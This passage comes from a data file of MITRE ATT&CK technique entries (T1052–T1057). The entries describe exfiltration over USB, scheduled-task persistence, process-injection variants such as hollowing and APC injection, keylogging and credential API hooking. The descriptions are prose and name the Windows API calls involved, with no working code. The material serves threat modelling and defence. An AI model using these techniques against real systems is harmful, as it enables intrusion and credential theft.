                          'external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and '
                          'processing device. The physical medium or device could be used as the final exfiltration '
                          'point or to hop between otherwise disconnected systems.',
           'name': 'Exfiltration Over Physical Medium',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1052.001': {'attack_id': 'T1052.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may attempt to exfiltrate data over a USB connected physical device. In '
                              'certain circumstances, such as an air-gapped network compromise, exfiltration could '
                              'occur via a USB device introduced by a user. The USB device could be used as the final '
                              'exfiltration point or to hop between otherwise disconnected systems.',
               'name': 'Exfiltration over USB',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1053': {'attack_id': 'T1053',
           'categories': ['execution', 'persistence', 'privilege-escalation'],
           'description': 'Adversaries may abuse task scheduling functionality to facilitate initial or recurring '
                          'execution of malicious code. Utilities exist within all major operating systems to schedule '
                          'programs or scripts to be executed at a specified date and time. A task can also be '
                          'scheduled on a remote system, provided the proper authentication is met (ex: RPC and file '
                          'and printer sharing in Windows environments). Scheduling a task on a remote system '
                          'typically requires being a member of an admin or otherwise privileged group on the remote '
                          'system.(Citation: TechNet Task Scheduler Security)\n'
                          '\n'
                          'Adversaries may use task scheduling to execute programs at system startup or on a scheduled '
                          'basis for persistence. These mechanisms can also be abused to run a process under the '
                          'context of a specified account (such as one with elevated permissions/privileges).',
           'name': 'Scheduled Task/Job',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1053.001': {'attack_id': 'T1053.001',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to '
                              'perform task scheduling for initial or recurring execution of malicious code. The '
                              '[at](https://attack.mitre.org/software/S0110) command within Linux operating systems '
                              'enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in '
                              'Linux)\n'
                              '\n'
                              'An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux '
                              'environments to execute programs at system startup or on a scheduled basis for '
                              'persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to '
                              'conduct remote Execution as part of Lateral Movement and or to run a process under the '
                              'context of a specified account.',
               'name': 'At (Linux)',
               'platforms': ['Linux']},
 'T1053.002': {'attack_id': 'T1053.002',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for '
                              'initial or recurring execution of malicious code. The '
                              '[at](https://attack.mitre.org/software/S0110) utility exists as an executable within '
                              'Windows for scheduling tasks at a specified time and date. Using '
                              '[at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service '
                              'be running, and the user to be logged on as a member of the local Administrators '
                              'group. \n'
                              '\n'
                              'An adversary may use <code>at.exe</code> in Windows environments to execute programs at '
                              'system startup or on a scheduled basis for persistence. '
                              '[at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote '
                              'Execution as part of Lateral Movement and or to run a process under the context of a '
                              'specified account (such as SYSTEM).\n'
                              '\n'
                              'Note: The <code>at.exe</code> command line utility has been deprecated in current '
                              'versions of Windows in favor of <code>schtasks</code>.',
               'name': 'At (Windows)',
               'platforms': ['Windows']},
 'T1053.003': {'attack_id': 'T1053.003',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the <code>cron</code> utility to perform task scheduling for '
                              'initial or recurring execution of malicious code. The <code>cron</code> utility is a '
                              'time-based job scheduler for Unix-like operating systems.  The <code> crontab</code> '
                              'file contains the schedule of cron entries to be run and the specified times for '
                              'execution. Any <code>crontab</code> files are stored in operating system-specific file '
                              'paths.\n'
                              '\n'
                              'An adversary may use <code>cron</code> in Linux or Unix environments to execute '
                              'programs at system startup or on a scheduled basis for persistence. <code>cron</code> '
                              'can also be abused to conduct remote Execution as part of Lateral Movement and or to '
                              'run a process under the context of a specified account.',
               'name': 'Cron',
               'platforms': ['Linux', 'macOS']},
 'T1053.004': {'attack_id': 'T1053.004',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for '
                              'initial or recurring execution of malicious code. The <code>launchd</code> daemon, '
                              'native to macOS, is responsible for loading and maintaining services within the '
                              'operating system. This process loads the parameters for each launch-on-demand '
                              'system-level daemon from the property list (plist) files found in '
                              '<code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> '
                              '(Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list '
                              'files which point to the executables that will be launched (Citation: Methods of Mac '
                              'Malware Persistence).\n'
                              '\n'
                              'An adversary may use the <code>launchd</code> daemon in macOS environments to schedule '
                              'new executables to run at system startup or on a scheduled basis for persistence. '
                              '<code>launchd</code> can also be abused to run a process under the context of a '
                              'specified account. Daemons, such as <code>launchd</code>, run with the permissions of '
                              'the root user account, and will operate regardless of which user account is logged in.',
               'name': 'Launchd',
               'platforms': ['macOS']},
 'T1053.005': {'attack_id': 'T1053.005',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial '
                              'or recurring execution of malicious code. There are multiple ways to access the Task '
                              'Scheduler in Windows. The <code>schtasks</code> can be run directly on the command '
                              'line, or the Task Scheduler can be opened through the GUI within the Administrator '
                              'Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper '
                              'for the Windows Task Scheduler, and alternatively, adversaries have used the Windows '
                              'netapi32 library to create a scheduled task.\n'
                              '\n'
                              'The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be '
                              'abused by adversaries (ex: [At '
                              '(Windows)](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> '
                              'can not access tasks created with <code>schtasks</code> or the Control Panel.\n'
                              '\n'
                              'An adversary may use Windows Task Scheduler to execute programs at system startup or on '
                              'a scheduled basis for persistence. The Windows Task Scheduler can also be abused to '
                              'conduct remote Execution as part of Lateral Movement and or to run a process under the '
                              'context of a specified account (such as SYSTEM).',
               'name': 'Scheduled Task',
               'platforms': ['Windows']},
 'T1053.006': {'attack_id': 'T1053.006',
               'categories': ['execution', 'persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse systemd timers to perform task scheduling for initial or '
                              'recurring execution of malicious code. Systemd timers are unit files with file '
                              'extension <code>.timer</code> that control services. Timers can be set to run on a '
                              'calendar event or after a time span relative to a starting point. They can be used as '
                              'an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux '
                              'environments.(Citation: archlinux Systemd Timers Aug 2020)\n'
                              '\n'
                              'Each <code>.timer</code> file must have a corresponding <code>.service</code> file with '
                              'the same name, e.g., <code>example.timer</code> and <code>example.service</code>. '
                              '<code>.service</code> files are [Systemd '
                              'Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by '
                              'the systemd system and service manager.(Citation: Linux man-pages: systemd January '
                              '2014) Privileged timers are written to <code>/etc/systemd/system/</code> and '
                              '<code>/usr/lib/systemd/system</code> while user level are written to '
                              '<code>~/.config/systemd/user/</code>.\n'
                              '\n'
                              'An adversary may use systemd timers to execute malicious code at system startup or on a '
                              'scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise '
                              'BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: '
                              'acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using '
                              'privileged paths may be used to maintain root level persistence. Adversaries may also '
                              'install user level timers to achieve user level persistence.',
               'name': 'Systemd Timers',
               'platforms': ['Linux']},
 'T1055': {'attack_id': 'T1055',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may inject code into processes in order to evade process-based defenses as well '
                          'as possibly elevate privileges. Process injection is a method of executing arbitrary code '
                          'in the address space of a separate live process. Running code in the context of another '
                          "process may allow access to the process's memory, system/network resources, and possibly "
                          'elevated privileges. Execution via process injection may also evade detection from security '
                          'products since the execution is masked under a legitimate process. \n'
                          '\n'
                          'There are many different ways to inject code into a process, many of which abuse legitimate '
                          'functionalities. These implementations exist for every major OS but are typically platform '
                          'specific. \n'
                          '\n'
                          'More sophisticated samples may perform multiple process injections to segment modules and '
                          'further evade detection, utilizing named pipes or other inter-process communication (IPC) '
                          'mechanisms as a communication channel. ',
           'name': 'Process Injection',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1055.001': {'attack_id': 'T1055.001',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. DLL injection is a '
                              'method of executing arbitrary code in the address space of a separate live process.  \n'
                              '\n'
                              'DLL injection is commonly performed by writing the path to a DLL in the virtual address '
                              'space of the target process before loading the DLL by invoking a new thread. The write '
                              'can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and '
                              '<code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> '
                              '(which calls the <code>LoadLibrary</code> API responsible for loading the DLL). '
                              '(Citation: Endgame Process Injection July 2017) \n'
                              '\n'
                              'Variations of this method such as reflective DLL injection (writing a self-mapping DLL '
                              'into a process) and memory module (map DLL when writing into process) overcome the '
                              'address relocation issue as well as the additional APIs to invoke execution (since '
                              'these methods load and execute the files in memory by manually preforming the function '
                              'of <code>LoadLibrary</code>).(Citation: Endgame HuntingNMemory June 2017)(Citation: '
                              'Endgame Process Injection July 2017) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via DLL '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Dynamic-link Library Injection',
               'platforms': ['Windows']},
 'T1055.002': {'attack_id': 'T1055.002',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject portable executables (PE) into processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. PE injection is a method '
                              'of executing arbitrary code in the address space of a separate live process. \n'
                              '\n'
                              'PE injection is commonly performed by copying code (perhaps without a file on disk) '
                              'into the virtual address space of the target process before invoking it via a new '
                              'thread. The write can be performed with native Windows API calls such as '
                              '<code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with '
                              '<code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of '
                              'the injected code does introduce the additional requirement for functionality to remap '
                              'memory references. (Citation: Endgame Process Injection July 2017) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via PE '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Portable Executable Injection',
               'platforms': ['Windows']},
 'T1055.003': {'attack_id': 'T1055.003',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into hijacked processes in order to evade '
                              'process-based defenses as well as possibly elevate privileges. Thread Execution '
                              'Hijacking is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Thread Execution Hijacking is commonly performed by suspending an existing process then '
                              'unmapping/hollowing its memory, which can then be replaced with malicious code or the '
                              'path to a DLL. A handle to an existing victim process is first created with native '
                              'Windows API calls such as <code>OpenThread</code>. At this point the process can be '
                              'suspended then written to, realigned to the injected code, and resumed via '
                              '<code>SuspendThread </code>, <code>VirtualAllocEx</code>, '
                              '<code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then '
                              '<code>ResumeThread</code> respectively.(Citation: Endgame Process Injection July 2017)\n'
                              '\n'
                              'This is very similar to [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing '
                              'process rather than creating a process in a suspended state.  \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via '
                              'Thread Execution Hijacking may also evade detection from security products since the '
                              'execution is masked under a legitimate process. ',
               'name': 'Thread Execution Hijacking',
               'platforms': ['Windows']},
 'T1055.004': {'attack_id': 'T1055.004',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via the asynchronous procedure '
                              'call (APC) queue in order to evade process-based defenses as well as possibly elevate '
                              'privileges. APC injection is a method of executing arbitrary code in the address space '
                              'of a separate live process. \n'
                              '\n'
                              'APC injection is commonly performed by attaching malicious code to the APC Queue '
                              "(Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when "
                              'the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing '
                              'victim process is first created with native Windows API calls such as '
                              '<code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke '
                              'a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL). \n'
                              '\n'
                              'A variation of APC injection, dubbed "Early Bird injection", involves creating a '
                              'suspended process in which malicious code can be written and executed before the '
                              "process' entry point (and potentially subsequent anti-malware hooks) via an APC. "
                              '(Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct '
                              '2016) is another variation that utilizes APCs to invoke malicious code previously '
                              'written to the global atom table.(Citation: Microsoft Atom Table)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via APC '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Asynchronous Procedure Call',
               'platforms': ['Windows']},
 'T1055.005': {'attack_id': 'T1055.005',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via thread local storage (TLS) '
                              'callbacks in order to evade process-based defenses as well as possibly elevate '
                              'privileges. TLS callback injection is a method of executing arbitrary code in the '
                              'address space of a separate live process. \n'
                              '\n'
                              'TLS callback injection involves manipulating pointers inside a portable executable (PE) '
                              "to redirect a process to malicious code before reaching the code's legitimate entry "
                              'point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by '
                              'threads. Manipulating TLS callbacks may be performed by allocating and writing to '
                              'specific offsets within a process’ memory space using other [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov '
                              '2017)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via TLS '
                              'callback injection may also evade detection from security products since the execution '
                              'is masked under a legitimate process. ',
               'name': 'Thread Local Storage',
               'platforms': ['Windows']},
 'T1055.008': {'attack_id': 'T1055.008',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via ptrace (process trace) system '
                              'calls in order to evade process-based defenses as well as possibly elevate privileges. '
                              'Ptrace system call injection is a method of executing arbitrary code in the address '
                              'space of a separate live process. \n'
                              '\n'
                              'Ptrace system call injection involves attaching to and modifying a running process. The '
                              'ptrace system call enables a debugging process to observe and control another process '
                              '(and each individual thread), including changing memory and register values.(Citation: '
                              'PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary '
                              'code into a running process (ex: <code>malloc</code>) then invoking that memory with '
                              '<code>PTRACE_SETREGS</code> to set the register containing the next instruction to '
                              'execute. Ptrace system call injection can also be done with '
                              '<code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a '
                              'specific address in the target processes’ memory (ex: the current address of the next '
                              'instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n'
                              '\n'
                              'Ptrace system call injection may not be possible targeting processes with '
                              'high-privileges, and on some system those that are non-child processes.(Citation: BH '
                              'Linux Inject) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via '
                              'ptrace system call injection may also evade detection from security products since the '
                              'execution is masked under a legitimate process. ',
               'name': 'Ptrace System Calls',
               'platforms': ['Linux']},
 'T1055.009': {'attack_id': 'T1055.009',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via the /proc filesystem in order '
                              'to evade process-based defenses as well as possibly elevate privileges. Proc memory '
                              'injection is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Proc memory injection involves enumerating the memory of a process via the /proc '
                              'filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) '
                              'payload with available gadgets/instructions. Each running process has its own '
                              'directory, which includes memory mappings. Proc memory injection is commonly performed '
                              'by overwriting the target processes’ stack using memory mappings provided by the /proc '
                              'filesystem. This information can be used to enumerate offsets (including the stack) and '
                              'gadgets (or instructions within the program that can be used to build a malicious '
                              'payload) otherwise hidden by process memory protections such as address space layout '
                              'randomization (ASLR). Once enumerated, the target processes’ memory map within '
                              '<code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed '
                              'Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n'
                              '\n'
                              'Other techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) '
                              'may be used to populate a target process with more available gadgets. Similar to '
                              '[Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory '
                              'injection may target child processes (such as a backgrounded copy of sleep).(Citation: '
                              'GDS Linux Injection) \n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via proc '
                              'memory injection may also evade detection from security products since the execution is '
                              'masked under a legitimate process. ',
               'name': 'Proc Memory',
               'platforms': ['Linux']},
 'T1055.011': {'attack_id': 'T1055.011',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into process via Extra Window Memory (EWM) in '
                              'order to evade process-based defenses as well as possibly elevate privileges. EWM '
                              'injection is a method of executing arbitrary code in the address space of a separate '
                              'live process. \n'
                              '\n'
                              'Before creating a window, graphical Windows-based processes must prescribe to or '
                              'register a windows class, which stipulate appearance and behavior (via windows '
                              'procedures, which are functions that handle input/output of data).(Citation: Microsoft '
                              'Window Classes) Registration of new windows classes can include a request for up to 40 '
                              'bytes of EWM to be appended to the allocated memory of each instance of that class. '
                              'This EWM is intended to store data specific to that window and has specific application '
                              'programming interface (API) functions to set and get its value. (Citation: Microsoft '
                              'GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n'
                              '\n'
                              'Although small, the EWM is large enough to store a 32-bit pointer and is often used to '
                              'point to a windows procedure. Malware may possibly utilize this memory location in part '
                              'of an attack chain that includes writing code to shared sections of the process’s '
                              'memory, placing a pointer to the code in EWM, then invoking execution by returning '
                              'execution control to the address in the process’s EWM.\n'
                              '\n'
                              "Execution granted through EWM injection may allow access to both the target process's "
                              'memory and possibly elevated privileges. Writing payloads to shared sections also '
                              'avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> '
                              'and <code>CreateRemoteThread</code>.(Citation: Endgame Process Injection July 2017) '
                              'More sophisticated malware samples may also potentially bypass protection mechanisms '
                              'such as data execution prevention (DEP) by triggering a combination of windows '
                              'procedures and other system functions that will rewrite the malicious payload inside an '
                              'executable portion of the target process.  (Citation: MalwareTech Power Loader Aug '
                              '2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via EWM '
                              'injection may also evade detection from security products since the execution is masked '
                              'under a legitimate process. ',
               'name': 'Extra Window Memory Injection',
               'platforms': ['Windows']},
 'T1055.012': {'attack_id': 'T1055.012',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into suspended and hollowed processes in order to '
                              'evade process-based defenses. Process hollowing is a method of executing arbitrary code '
                              'in the address space of a separate live process.  \n'
                              '\n'
                              'Process hollowing is commonly performed by creating a process in a suspended state then '
                              'unmapping/hollowing its memory, which can then be replaced with malicious code. A '
                              'victim process can be created with native Windows API calls such as '
                              '<code>CreateProcess</code>, which includes a flag to suspend the processes primary '
                              'thread. At this point the process can be unmapped using APIs calls such as '
                              '<code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being '
                              'written to, realigned to the injected code, and resumed via '
                              '<code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, '
                              '<code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: '
                              'Leitch Hollowing)(Citation: Endgame Process Injection July 2017)\n'
                              '\n'
                              'This is very similar to [Thread Local '
                              'Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process '
                              'rather than targeting an existing process. This behavior will likely not result in '
                              'elevated privileges since the injected process was spawned from (and thus inherits the '
                              'security context) of the injecting process. However, execution via process hollowing '
                              'may also evade detection from security products since the execution is masked under a '
                              'legitimate process. ',
               'name': 'Process Hollowing',
               'platforms': ['Windows']},
 'T1055.013': {'attack_id': 'T1055.013',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into process via process doppelgänging in order '
                              'to evade process-based defenses as well as possibly elevate privileges. Process '
                              'doppelgänging is a method of executing arbitrary code in the address space of a '
                              'separate live process. \n'
                              '\n'
                              'Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe '
                              'file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only '
                              'one transacted handle to write to a file at a given time. Until the write handle '
                              'transaction is terminated, all other handles are isolated from the writer and may only '
                              'read the committed version of the file that existed at the time the handle was opened. '
                              '(Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic '
                              'rollback if the system or application fails during a write transaction. (Citation: '
                              'Microsoft Where to use TxF)\n'
                              '\n'
                              'Although deprecated, the TxF application programming interface (API) is still enabled '
                              'as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n'
                              '\n'
                              'Adversaries may abuse TxF to a perform a file-less variation of [Process '
                              'Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process '
                              'Hollowing](https://attack.mitre.org/techniques/T1093), process doppelgänging involves '
                              'replacing the memory of a legitimate process, enabling the veiled execution of '
                              "malicious code that may evade defenses and detection. Process doppelgänging's use of "
                              'TxF also avoids the use of highly-monitored API functions such as '
                              '<code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and '
                              '<code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)\n'
                              '\n'
                              'Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process '
                              'Doppelgänging Dec 2017):\n'
                              '\n'
                              '* Transact – Create a TxF transaction using a legitimate executable then overwrite the '
                              'file with malicious code. These changes will be isolated and only visible within the '
                              'context of the transaction.\n'
                              '* Load – Create a shared section of memory and load the malicious executable.\n'
                              '* Rollback – Undo changes to original executable, effectively removing malicious code '
                              'from the file system.\n'
                              '* Animate – Create a process from the tainted section of memory and initiate '
                              'execution.\n'
                              '\n'
                              'This behavior will likely not result in elevated privileges since the injected process '
                              'was spawned from (and thus inherits the security context) of the injecting process. '
                              'However, execution via process doppelgänging may evade detection from security products '
                              'since the execution is masked under a legitimate process. ',
               'name': 'Process Doppelgänging',
               'platforms': ['Windows']},
 'T1055.014': {'attack_id': 'T1055.014',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may inject malicious code into processes via VDSO hijacking in order to '
                              'evade process-based defenses as well as possibly elevate privileges. Virtual dynamic '
                              'shared object (vdso) hijacking is a method of executing arbitrary code in the address '
                              'space of a separate live process. \n'
                              '\n'
                              'VDSO hijacking involves redirecting calls to dynamically linked shared libraries. '
                              'Memory protections may prevent writing executable code to a process via [Ptrace System '
                              'Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack '
                              'the syscall interface code stubs mapped into a process from the vdso shared object to '
                              'execute syscalls to open and map a malicious shared object. This code can then be '
                              'invoked by redirecting the execution flow of the process via patched memory address '
                              "references stored in a process' global offset table (which store absolute addresses of "
                              'mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) '
                              '(Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via VDSO '
                              'hijacking may also evade detection from security products since the execution is masked '
                              'under a legitimate process.  ',
               'name': 'VDSO Hijacking',
               'platforms': ['Linux']},
 'T1056': {'attack_id': 'T1056',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may use methods of capturing user input to obtain credentials or collect '
                          'information. During normal system usage, users often provide credentials to various '
                          'different locations, such as login pages/portals or system dialog boxes. Input capture '
                          'mechanisms may be transparent to the user (e.g. [Credential API '
                          'Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into '
                          'providing input into what they believe to be a genuine service (e.g. [Web Portal '
                          'Capture](https://attack.mitre.org/techniques/T1056/003)).',
           'name': 'Input Capture',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1056.001': {'attack_id': 'T1056.001',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may log user keystrokes to intercept credentials as the user types them. '
                              'Keylogging is likely to be used to acquire credentials for new access opportunities '
                              'when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not '
                              'effective, and may require an adversary to intercept keystrokes on a system for a '
                              'substantial period of time before credentials can be successfully captured.\n'
                              '\n'
                              'Keylogging is the most prevalent type of input capture, with many different ways of '
                              'intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n'
                              '\n'
                              '* Hooking API callbacks used for processing keystrokes. Unlike [Credential API '
                              'Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API '
                              'functions intended for processing keystroke data.\n'
                              '* Reading raw keystroke data from the hardware buffer.\n'
                              '* Windows Registry modifications.\n'
                              '* Custom drivers.\n'
                              '* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide '
                              'adversaries with hooks into the operating system of network devices to read raw '
                              'keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ',
               'name': 'Keylogging',
               'platforms': ['Windows', 'macOS', 'Linux', 'Network']},
 'T1056.002': {'attack_id': 'T1056.002',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may mimic common operating system GUI components to prompt users for '
                              'credentials with a seemingly legitimate prompt. When programs are executed that need '
                              'additional privileges than are present in the current user context, it is common for '
                              'the operating system to prompt the user for proper credentials to authorize the '
                              'elevated privileges for the task (ex: [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002)).\n'
                              '\n'
                              'Adversaries may mimic this functionality to prompt users for credentials with a '
                              'seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a '
                              'fake installer requiring additional access or a fake malware removal suite.(Citation: '
                              'OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials '
                              'via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct '
                              '2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust '
                              'Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015). ',
               'name': 'GUI Input Capture',
               'platforms': ['macOS', 'Windows']},
 'T1056.003': {'attack_id': 'T1056.003',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may install code on externally facing portals, such as a VPN login page, to '
                              'capture and transmit credentials of users who attempt to log into the service. For '
                              'example, a compromised login page may log provided user credentials before logging the '
                              'user in to the service.\n'
                              '\n'
                              'This variation on input capture may be conducted post-compromise using legitimate '
                              'administrative access as a backup measure to maintain network access through [External '
                              'Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial '
                              'compromise by exploitation of the externally facing web service.(Citation: Volexity '
                              'Virtual Private Keylogging)',
               'name': 'Web Portal Capture',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1056.004': {'attack_id': 'T1056.004',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may hook into Windows application programming interface (API) functions to '
                              'collect user credentials. Malicious hooking mechanisms may capture API calls that '
                              'include parameters that reveal user authentication credentials.(Citation: Microsoft '
                              'TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike '
                              '[Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses '
                              'specifically on API functions that include parameters that reveal user credentials. '
                              'Hooking involves redirecting calls to these functions and can be implemented via:\n'
                              '\n'
                              '* **Hooks procedures**, which intercept and execute designated code in response to '
                              'events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook '
                              'Overview)(Citation: Endgame Process Injection July 2017)\n'
                              '* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, '
                              'where pointers to imported API functions are stored.(Citation: Endgame Process '
                              'Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: '
                              'MWRInfoSecurity Dynamic Hooking 2015)\n'
                              '* **Inline hooking**, which overwrites the first bytes in an API function to redirect '
                              'code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge '
                              'Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n',
               'name': 'Credential API Hooking',
               'platforms': ['Windows']},
 'T1057': {'attack_id': 'T1057',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get information about running processes on a system. Information '
                          'obtained could be used to gain an understanding of common software/applications running on '
                          'systems within the network. Adversaries may use the information from [Process '
                          'Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.\n'
                          '\n'
                          'In Windows environments, adversaries could obtain details on running processes using the '
                          '[Tasklist](https://attack.mitre.org/software/S0057) utility via '
                          '[cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes '
                          'can also be extracted from the output of [Native '
                          'API](https://attack.mitre.org/techniques/T1106) calls such as '
